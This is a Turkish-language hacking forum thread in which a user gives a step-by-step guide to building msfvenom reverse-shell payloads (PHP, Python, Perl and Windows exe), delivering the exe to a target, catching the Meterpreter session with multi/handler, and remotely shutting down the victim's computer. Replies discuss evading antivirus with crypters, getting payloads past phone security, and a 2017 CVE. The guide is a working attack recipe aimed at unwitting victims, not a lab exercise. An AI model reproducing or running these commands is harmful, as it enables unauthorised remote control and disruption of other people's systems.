karsi sistemi kapama me.tasploitten sesli anlatim (:

cewl

Kıdemli Üye
3 Haz 2017
2,871
9
29
Merdekan


salam eleykum arkadaslar





Arkadaslar nasilsinz ? bu gun sizlere kali linuksun 2017 surumlerinde gelen msfvenom ile 1 payloadi olusdurup hedef sisteme atarak hedef sistemi kapamaqi yani sondurmeyi gostereceyim ilk olarak msfvenom yazmak lazim terminalda

vJ4nm4.jpg



Kod:
     msfvenom



Msfvenom nedir ? > ****sploit'in en kullanışlı (ve başlayanlara göre az gelişmiş) yeteneklerinden biri genellikle msfpayload modülüdür. Bu modül ile çoklu yükler oluşturulabilir ve neredeyse her durumda bir kabuk verebilecek bir şey yardımcı olur. Bu yüklerin her biri için msfconsole'a gidip exploit / multi / handler'ı seçebilirsiniz. Kullanılan ilgili yük için 'yükü ayarla' komutunu çalıştırın ve gerekli tüm seçenekleri yapılandırın (LHOST, LPORT vb.). Çalıştırın ve yükün çalıştırılmasını bekleyin. Aşağıdaki örnekler için oldukça açıklayıcıdır, ancak LHOST, IP adresinizle (ağda saldırıyorsa LAN IP, İnternette saldırıyorsa WAN IP) doldurulması ve LPORT'un tekrar bağlanmak istediğiniz bağlantı noktası olması gerekir.




yardim almak icin



Kod:
     msfvenom -l




bir shell yaratmak icin ise


Kod:
      msfvenom -p php/meterpreter_reverse_tcp LHOST=<ip> LPORT=<aciq port> -f raw > /root/Desktop/cewl.php






python dilinde formatinda 1 payload yaratmak icin ise


Kod:
      msfvenom -p cmd/unix/reverse_python LHOST=<lokal ip> LPORT=<acik port numarasi> -f raw > /root/Desktop/cewl.py







perl dilinde ise



Kod:
   msfvenom -p cmd/unix/reverse_perl LHOST=<lokal ip > LPORT=<acik port numarasi > -f raw > /root/Desktop/cewl.pl








evet arkadaslar bir exe payload hazir etmek icin ise terminala boyle yazalim ve cikisin ana ekran edelimki sonra kok den aramayak

Kod:
   msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=acik port -f exe > /root/Desktop/dosyaismi.exe

soyledik ve biraz bekledikden sonra ise ekrana duser hedefinize ise farkli yontemlerle gondere bilirsiniz simdide varsayalim hedef payloadi exe tikladi biz terminala


Kod:
 msfconsole


yazalim ve ****sploit aclacakdir



ve arkadaslar yanlislikla videoda parametre yerine payload demisim heyecannan ola bilir ilk sesli yaaa :RpS_laugh:


simdi ise parametreleri girelim


Kod:
   use exploit/multi/handler

Kod:
   set payload windows/meterpreter/reverse_tcp

Kod:
   set LHOST=ip

Kod:
   set LPORT= acik port

Kod:
    exploit


diyoruz ve aclacak otrum acildikda hedef proqrama girdikde drek sessions -i ile id kiymeyi oyrenerek otrum edniyoruz

Kod:
  sessions -i 1

diyerek otrum adindikden sonra ise karsi tarafin bilgisayarin kapanmasi icin ise

Kod:
   shutdown -s -t 4000

yazarak karsis sistemi kapattik :)


[ame="https://www.youtube.com/watch?v=hs-lR6KyFdU&t=14s"]https://www.youtube.com/watch?v=hs-lR6KyFdU&t=14s[/ame]
 
Son düzenleme:

cewl

Kıdemli Üye
3 Haz 2017
2,871
9
29
Merdekan
Ellerinize Sağlık...

Ellerine sağlık

Aşleyküm Selam eline sağlık güzel anlatım

ela konu elina sağlıq (azeri şivesiyle oldumu :D)

Bilmeyenler ücün Ela konudu Eline sağlıq


Eline saglik yine dökturmussun

cox sagolun :)


saolun
 

Amis

Katılımcı Üye
22 Ağu 2016
783
0
Elazığ

ellerine sağlık güzel anlatmışsın ancak zaten onu yedirdikten sonra sistemi kapatma ihtiyacı niye duyalımki komple sistem bizim elimizde zaten istediğimizi yaparız :D gerisi hayal gücü zaten ama anlatımın güzel

Ek olarak benim kali linux sanırım eski sürüm msfvenom yok güncellemek için ne yapabilirim
 

cewl

Kıdemli Üye
3 Haz 2017
2,871
9
29
Merdekan
ellerine sağlık güzel anlatmışsın ancak zaten onu yedirdikten sonra sistemi kapatma ihtiyacı niye duyalımki komple sistem bizim elimizde zaten istediğimizi yaparız :D gerisi hayal gücü zaten ama anlatımın güzel

Ek olarak benim kali linux sanırım eski sürüm msfvenom yok güncellemek için ne yapabilirim


cox sagol isde oylesine met.asploitin yapicisi na sorman gerekiyor neden boyle parametre var deye benden konunu acmak bilmeyen arkadaslara yardim etmekdir googlede kali hakkinda arasdira ve bu parametrenin kaldirilmasini rica ede bilirsin :RpS_biggrin:
 

karazafer_

Kıdemli Üye
11 Ağu 2009
2,267
4
System32
yaw dostum emek vermişsin ama venom her tür anti vir ve tarayıcıdan engellenmiş. defender bile tanıyor bunları. eskimiş şeyleri anlatacağına yeni çıkan buffer overflow ne bilem shellcode exploit leri falan anlat. bunlar tarih oldu. tabi çok iyi crypter yapabiliosan başka. CVE-2017-11882 bu exploit 2017 11 de çıktı şuan tanımayan güvenlik duvarı yok
 

cewl

Kıdemli Üye
3 Haz 2017
2,871
9
29
Merdekan
yaw dostum emek vermişsin ama venom her tür anti vir ve tarayıcıdan engellenmiş. defender bile tanıyor bunları. eskimiş şeyleri anlatacağına yeni çıkan buffer overflow ne bilem shellcode exploit leri falan anlat. bunlar tarih oldu. tabi çok iyi crypter yapabiliosan başka. CVE-2017-11882 bu exploit 2017 11 de çıktı şuan tanımayan güvenlik duvarı yok


ooooo dostum kecmisin bilmeyen geleceye 1 gozle bakar o uzden me.tasploit amcanin kecmisini bilelmek lazim tabi sen yazanlar acilmis o konular ne yapim ? yeniden acsam aynisin kopya olar
 

MREA

Üye
12 Haz 2016
235
0
Ellerine sağlık hocam payloadı telefona yedirirken güvenlik duvarı cikiyor calistirmiyor telefonda ne yapabiliriz?
 

karazafer_

Kıdemli Üye
11 Ağu 2009
2,267
4
System32
ooooo dostum kecmisin bilmeyen geleceye 1 gozle bakar o uzden me.tasploit amcanin kecmisini bilelmek lazim tabi sen yazanlar acilmis o konular ne yapim ? yeniden acsam aynisin kopya olar

dsotum bunlarda var ama sonuçta :) bak gerçekten emek varmiştin eyvallah keşke artvinde falan olsanda sokak lambalarıyla oynasak azıcık :D yardımcı lazım :D
 

ggaz

Yeni üye
4 Tem 2016
23
2
merhaba,öncelikle yaptıgın paylaşımlar için ayrıca video ve resimlerle desteklediğin için çok teşşekür ederim paylaştıgın şeyleri deniyorum fakat bunda bir sorunla karşılarştım yardımcı olursan çok sevinirim


yeni bir dizin oluşturma aşamasında 'cp b.exe /var/www/html/321/' kısmında cp failed to access bu bir dizin değil hatası alıyorum yardımcı olursan sevinirim teşşekürler
 

cewl

Kıdemli Üye
3 Haz 2017
2,871
9
29
Merdekan
merhaba,öncelikle yaptıgın paylaşımlar için ayrıca video ve resimlerle desteklediğin için çok teşşekür ederim paylaştıgın şeyleri deniyorum fakat bunda bir sorunla karşılarştım yardımcı olursan çok sevinirim


yeni bir dizin oluşturma aşamasında 'cp b.exe /var/www/html/321/' kısmında cp failed to access bu bir dizin değil hatası alıyorum yardımcı olursan sevinirim teşşekürler


merhaba terminalda cp -r b.exe /root/var/www/html yaz
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.